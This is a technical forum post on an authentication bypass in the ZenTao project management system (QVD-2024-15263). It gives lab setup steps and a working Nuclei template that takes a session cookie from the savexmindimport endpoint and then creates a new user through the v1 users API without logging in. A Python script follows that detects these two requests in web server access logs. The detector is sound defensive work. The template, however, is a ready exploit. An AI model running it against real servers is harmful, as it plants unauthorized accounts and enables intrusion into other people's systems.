QVD-2024-15263

江月   ·   Posted on 2024-04-28 21:20:00   ·   Technical article

Vulnerability overview

ZenTao project management system authentication bypass

Download

https://www.zentao.net/download.html

Environment

Linux CentOS 7.6
ZenTao source package: 18.11 ZenTaoPMS-18.11-zbox_amd64.tar

Steps

1. Extract ZenTaoPMS-18.11-zbox_amd64.tar into the /opt directory
2. Change into the directory: cd /opt/zbox/
3. Start the service: ./zbox start
4. Open in a browser: 127.0.0.1

Nuclei PoC template

id: QVD-2024-15263

info:
  name: Oa-Chandao-AuthBypass
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  metadata:
    Hunter-query: xxx
  tags: chandao

variables:
  username: "{{to_lower(rand_base(3))}}"

http:
  - raw:
      - |
        GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /zentao/api.php/v1/users HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{plt}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Connection: close
        Content-Type: application/json

        {"account":"{{username}}","password":"Qwe123","realname":"{{username}}","role":"","group":"2"}
    extractors:
      - type: regex
        part: header
        name: plt
        internal: true
        regex:
          - 'zentaosid(.*?);'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(header_2,"zentao") && status_code==403
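For defenders, the template above gives two log-visible indicators: a GET to api.php with m=testcase&f=savexmindimport, followed shortly by a POST to /zentao/api.php/v1/users from the same client. The following script is an added example written for this page (it is not from the original post or from the ZenTao project) that runs that two-stage check over web server access logs. It assumes Apache combined log format, the sample lines are constructed, the 60-second correlation window is an arbitrary assumption, and the "zentao" path prefix is taken from the template's requests.

```python
import re
from datetime import datetime

# Constructed sample access-log lines in Apache combined format (assumed format).
# The first client reproduces the template's two requests; the second client is
# an ordinary user-management call without the preceding savexmindimport request.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Apr/2024:21:20:01 +0800] "GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=abc&branch=def HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Apr/2024:21:20:02 +0800] "POST /zentao/api.php/v1/users HTTP/1.1" 403 128 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Apr/2024:21:25:00 +0800] "GET /zentao/index.php?m=user&f=login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Apr/2024:21:25:30 +0800] "POST /zentao/api.php/v1/users HTTP/1.1" 201 256 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Stage 1: testcase/savexmindimport reached through api.php (indicator taken from
# the template on this page). Stage 2: user creation through the v1 REST API.
STAGE1 = re.compile(
    r'^/zentao/api\.php\?(?=.*\bm=testcase\b)(?=.*\bf=savexmindimport\b)', re.I
)
STAGE2_PATH = "/zentao/api.php/v1/users"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text, window_seconds=60):
    """Flag stage-1 requests on their own, and stage-2 requests that follow a
    stage-1 request from the same client within window_seconds (assumed window)."""
    findings = []
    last_stage1 = {}  # client IP -> timestamp of its most recent stage-1 request
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["method"] == "GET" and STAGE1.match(rec["path"]):
            last_stage1[ip] = ts
            findings.append({"ip": ip, "rule": "savexmindimport-via-api", "line": line})
        elif rec["method"] == "POST" and rec["path"].split("?")[0] == STAGE2_PATH:
            t1 = last_stage1.get(ip)
            if t1 is not None and 0 <= (ts - t1).total_seconds() <= window_seconds:
                findings.append({"ip": ip, "rule": "session-then-user-create", "line": line})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["rule"], f["ip"], f["line"][:80])
```

A POST to /api.php/v1/users by itself is normal administrative traffic and is not flagged; only the stage-1 request, and a user-creation call that follows it from the same client, produce findings. Feed real logs through detect() by reading the file and passing its contents in place of SAMPLE_LOG.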

Verification


1 reply   |  until 7 months ago | 801 views

小瑟斯
Posted 7 months ago

666


© 2016 - 2024 掌控者 All Rights Reserved.